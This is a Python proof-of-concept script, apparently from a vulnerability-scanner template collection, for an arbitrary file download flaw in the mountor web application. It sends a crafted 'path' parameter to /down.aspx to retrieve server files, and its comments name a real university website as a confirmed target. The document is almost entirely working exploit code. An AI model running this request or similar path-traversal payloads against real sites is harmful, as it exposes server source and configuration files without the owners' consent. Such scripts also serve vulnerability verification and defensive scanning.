mountor /down.aspx 任意文件下载

#!/usr/bin/env python # coding=utf-8 import urllib import urllib2 import re from comm import cmdline from comm import generic """ 成功测试网站 http://www.arts.cqu.edu.cn/cn """ ''' 必填值： poc_info 字典必写，记录poc信息，不可用其他名字必须poc_info ''' poc_info = { 'VulId' : '1259', # webvul的ID号 'Name' : 'mountor /down.aspx 任意文件下载 POC', # poc的名字，首字母大写 'AppName' : 'mountor', # app名称 'AppPowerLink': 'http://mountor.cn', # app官网地址 'AppVersion' : '', # app程序详细版本 'VulType' : 'Arbitrary File Download', # 漏洞类型名称 'Desc' : ''' mountor程序嵌套人员考虑不周，未对下载文件类型导致任意文件下载 ''', 'Author' : ['erevus @ Knownsec'], # 完成人 'VulDate' : '2014-04-03', # 漏洞首发时间 'CreateDate' : '2014-04-09', # 编写此poc的时间 'UpdateDate' : '2014-04-09', # 最后一次更新此poc的时间 'References' : ['http://wooyun.org/bugs/wooyun-2014-055282'], # 与漏洞相关的链接 'Version' : '1', # 本poc的版本，一般为1，若有第二次更新改为2,以此类推 } ''' 必填值：io_info 字典必写，记录输入输出信息，名字不可变必须叫io_info，这是个全局变量！！！''' io_info = { 'URL' : '', 'Mode' : 'v', # 默认值为 v 代表 verify 'Verbose' : False, # 默认值为False代表不打印详细信息 'Error' : '', # 记录poc失败信息 'Status' : 0, # 默认值为0代表poc没执行成功，执行成功必须更新该值为1 'Result' : {} } def main(io_info): '''interface function, io_info is a global io dict''' url = io_info.get('URL','') mode = io_info.get('Mode','v') verbose = io_info.get('Verbose', False) headers_fake = generic.modify_headers(io_info) url = url + "/down.aspx?path=./down.aspx" if (mode=='v' or mode=='a'): try: response = urllib2.urlopen(url) html = response.read() if "<%@ Page Language=\"C#\" %>" in html: if "System.IO.FileInfo(" in html: if "Response.End();" in html: io_info['Status'] = 1 io_info['Result']['FileInfo'] = {} io_info['Result']['FileInfo']['Filename'] = 'down.aspx' io_info['Result']['FileInfo']['Content'] = html else: io_info['Status'] = 0 except Exception, e: io_info['Error'] = '[*] '+str(e) if __name__=="__main__": # usage表示poc命令行运行的使用帮助，如果留空则使用默认的 # 如果没有特殊命令行附加参数，则argvs可为空，默认参数有-u/--url，-m/--mode，-v cmdline.main(io_info, usage='', argvs=[]) if io_info['Verbose']: print '\n[*] Init ...\n' main(io_info) print generic.output(io_info)